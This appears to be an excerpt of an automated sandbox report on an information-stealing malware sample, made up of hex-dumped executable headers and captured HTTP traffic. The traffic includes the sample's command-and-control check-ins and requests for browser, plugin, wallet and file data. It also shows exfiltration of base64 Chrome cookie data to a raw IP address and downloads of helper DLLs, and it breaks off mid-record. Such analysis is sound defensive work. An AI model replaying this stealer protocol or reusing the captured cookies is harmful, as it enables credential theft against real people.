10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 11:35:34 GMTContent-Type: application/octet-streamContent-Length: 363424Last-Modified: Thu, 19 Sep 2024 23:31:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ecb454-58ba0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 31 05 00 00 20 00 00 00 32 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 05 00 00 06 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 51 05 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 41 05 00 14 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 4f 10 e0 7a 9d 12 3f 5a cb c3 23 e8 83 85 c0 ee 62 e2 17 74 b1 48 16 78 4b 84 98 93 07 c0 f7 fd 2b f2 05 10 2c b9 ae bc 35 37 b0 87 15 04 3e 31 8d 47 32 e9 25 6a f5 ff cb 16 fe 05 c0 75 f2 b8 2d 94 45 c7 b7 6d 52 9a 55 86 1b dd f8 2d 36 57 c8 34 9c 62 57 b2 ae af 35 e3 3e 42 a1 07 08 5d d3 a7 7f 20 04 e2 85 b0 73 b6 c3 66 15 27 af 28 6f b6 fd c7 7d bf e1 bd 6b bc 50 fd e5 71 3e 6a 92 ca 8e e4 5d 5b 54 ab 07 91 c6 db 0c a0 87 2e c4 c8 f9 a5 d1 73 8a 70 7d 48 54 2d 6f 38 2e 8c 1c 07 f1 5e 9a 9f 94 d0 05 70 0f b0 b2 7f d5 4b 37 3f c3 6e 89 74 45 4b 3e 5e e5 8c 38 1c 70 b8 d1 82 cc a5 db f1 2b a0 62 57 8c f6 ee 8b 7b 3a 53 ad b9 fc 6a c7 05 0f 5a 0f ea ae d0 a3 dc 8f b9 aa 7a 8f 64 32 e3 69 c2 a4 e3 ad f4 ee a7 36 35 b9 75 0a 7c bf 76 55 79 31 b8 01 ae f8 23 36 9e eb 08 f1 0f 12 50 14 b7 92 7d f7 24 04 de 8a 4b bf 86 5c 58 d6 a2 f3 fb 12 24 b4 d2 5a db 44 0d fd d2 f6 58 12 d7 71 8f 4b 85 5e 0
                        Source: global trafficHTTP traffic detected: GET /lgsfdam.exe HTTP/1.1Host: nerv.com.peCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFHJKEBAAECBFHIECGIHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 37 31 43 45 31 36 43 46 45 35 33 34 32 32 38 33 31 39 34 30 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 45 43 46 48 4a 4b 45 42 41 41 45 43 42 46 48 49 45 43 47 49 2d 2d 0d 0a Data Ascii: ------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="hwid"C71CE16CFE534228319403------ECFHJKEBAAECBFHIECGIContent-Disposition: form-data; name="build"default------ECFHJKEBAAECBFHIECGI--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="message"browsers------KFHJJDHJEGHJKECBGCFH--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFCHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 42 41 4b 46 43 42 46 48 49 4a 4a 4a 4a 44 42 46 43 2d 2d 0d 0a Data Ascii: ------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------BKFBAKFCBFHIJJJJDBFCContent-Disposition: form-data; name="message"plugins------BKFBAKFCBFHIJJJJDBFC--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCGDBGCAAEBFIECGHDGHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 44 47 2d 2d 0d 0a Data Ascii: ------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------DGCGDBGCAAEBFIECGHDGContent-Disposition: form-data; name="message"fplugins------DGCGDBGCAAEBFIECGHDG--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGHost: 46.8.231.109Content-Length: 8583Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKFHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4f 44 45 7a 4d 44 41 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 6b 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 7a 41 77 4e 44 6b 35 43 55 35 4a 52 41 6b 31 4d 54 45 39 61 7a 6c 30 56 44 4e 78 4e 31 6c 6d 61 44 46 75 65 46 39 47 55 32 77 77 4e 6b 59 31 56 55 56 66 64 6d 52 68 52 6c 46 79 5a 57 6c 48 53 32 55 78 59 55 52 4f 4f 44 4e 4e 5a 58 5a 6c 52 44 64 51 54 44 46 53 57 6c 68 32 59 54 52 7a 4c 57 35 47 59 7a 6c 33 59 56 46 70 4f 55 78 30 53 32 46 32 64 56 52 4a 59 6d 45 34 54 56 56 72 62 30 64 31 4e 54 68 46 4f 45 55 34 4d 57 64 33 51 6c 39 55 56 30 6f 30 54 6d 63 74 54 47 5a 44 64 6e 70 6f 5a 57 30 33 63 6b 35 79 61 46 70 52 4d 6d 46 48 64 6b 70 61 4f 57 63 79 56 46 6c 6f 63 58 67 79 56 7a 4a 50 4e 45 55 33 64 55 68 52 65 6c 42 72 4d 33 5a 31 54 48 5a 4e 54 48 68 47 57 46 70 7a 63 55 55 32 54 6d 52 42 56 6d 6c 52 52 45 56 44 52 33 42 76 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 43 42 41 41 41 46 48 49 49 45 42 46 43 42 4b 46 2d 2d 0d 0a Data Ascii: ------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------JKJECBAAAFHIIEBFCBKFContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwODEzMDAJMVBfSkFSCTIwMjMtMTAtMDUtMDkKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMzAwNDk5CU5JRAk1MTE9azl0VDNxN1lmaDFueF9GU2wwNkY1VUVfdmRhRlF
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="file"------FHDAFIIDAKJDGDHIDAKJ--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file"------JJJDGIECFCAKKFHIIIJE--
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 46.8.231.109Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJEHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="message"wallets------EHCAEGDHJKFHJKFIJKJE--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHIIJDGHCBFIECBKEGHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------FBGHIIJDGHCBFIECBKEGContent-Disposition: form-data; name="token"dada4ad7c989e59c63cad8c1de0f724a1fd7bdf07dfc550445611ed440e5079f9d681bb0------FBGHIIJDGHCBFIECBKEGContent-Disposition: form-data; name="message"files------FBGHIIJDGHCBFIECBKEG--
                        Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEGDHJDHDAFHJJKJEHCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 61 64 61 34 61 64 37 63 39 38 39 65 35 39 63 36 33 63 61 64 38 63 31 64 65 30 66 37 32 34 61 31 66 64 37 62 64 66 30 37 64 66 63 35 35 30 34 34 35 36 31 31 65 64 34 34 30 65 35 30 37 39 66 39 64 36 38 31 62 62 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 47 44 48 4a 44 48 44 41 46 48 4a 4a 4b 4a 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 